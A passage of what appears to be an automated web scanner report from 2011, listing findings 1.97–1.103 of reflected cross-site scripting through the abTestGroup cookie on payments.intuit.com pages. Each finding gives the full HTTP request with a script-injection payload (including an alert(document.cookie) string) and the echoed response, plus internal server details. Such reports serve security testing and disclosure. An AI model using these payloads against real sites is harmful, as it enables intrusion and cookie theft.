HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=dCkX6oL--hpQ36+ZvLN4zA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960C52D0A0805192AA117E344932928
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116179


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16ff5ed<script>alert(1)</script>1c8e4d0787a<br />
...[SNIP]...

1.97. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 6fb36<script>alert(1)</script>4c918b363ab was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T166fb36<script>alert(1)</script>4c918b363ab;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:41 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=5+RKX6vGqEPDQ0N1aaWgzA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:42 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96117780A0805192AA117E3CB6FBF98
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140388


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T166fb36<script>alert(1)</script>4c918b363ab<br />
...[SNIP]...

1.98. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66866"><script>alert(1)</script>32afa1f3f6c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1666866"><script>alert(1)</script>32afa1f3f6c;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=zRzKl+MSVxM+3HdgcANKFg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F946E0A0805192AA117E332CBAC17
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140401


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T1666866"><script>alert(1)</script>32afa1f3f6c" type="hidden" />
...[SNIP]...

1.99. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d3b88<script>alert(1)</script>6e2a002a14f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d3b88<script>alert(1)</script>6e2a002a14f;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=L-zz2dNUext+4Q-KcuN0bQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:26 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FEAFE0A0805192AA117E37B6CBEAF
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100552


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<br />
       A/B Test Group: T16d3b88<script>alert(1)</script>6e2a002a14f<br />
...[SNIP]...

1.100. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d02"><script>alert(1)</script>94241c27c76 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1619d02"><script>alert(1)</script>94241c27c76;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:36 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=yWSAZf5c4xcytMMezhM63w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:37 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E404B0A0805192AA117E37069D512
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100565


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<input id="testGroup" value="T1619d02"><script>alert(1)</script>94241c27c76" type="hidden" />
...[SNIP]...

1.101. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d5f4"><script>alert(1)</script>87efd050621 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T168d5f4"><script>alert(1)</script>87efd050621;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=n19gPeGfvwyyWV29gPb8Ng**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:26 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D2E3B0A0805192AA117E3AF226B64
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100565


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<input id="testGroup" value="T168d5f4"><script>alert(1)</script>87efd050621" type="hidden" />
...[SNIP]...

1.102. http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 62983<script>alert(1)</script>3ae0052e269 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1662983<script>alert(1)</script>3ae0052e269;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:03:35 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=7oJ44ylVUt+Li-Z7PXRP7Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:40:36 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F28BD0A0805192AA117E37695A7D1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100552


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<br />
       A/B Test Group: T1662983<script>alert(1)</script>3ae0052e269<br />
...[SNIP]...

1.103. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 666da<script>alert(1)</script>b41e58df354 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16666da<script>alert(1)</script>b41e58df354;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:50 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Z1BCpO0dBLLog6V8f1FTVA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:51 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D961387A0A0805192AA117E3832F3F96
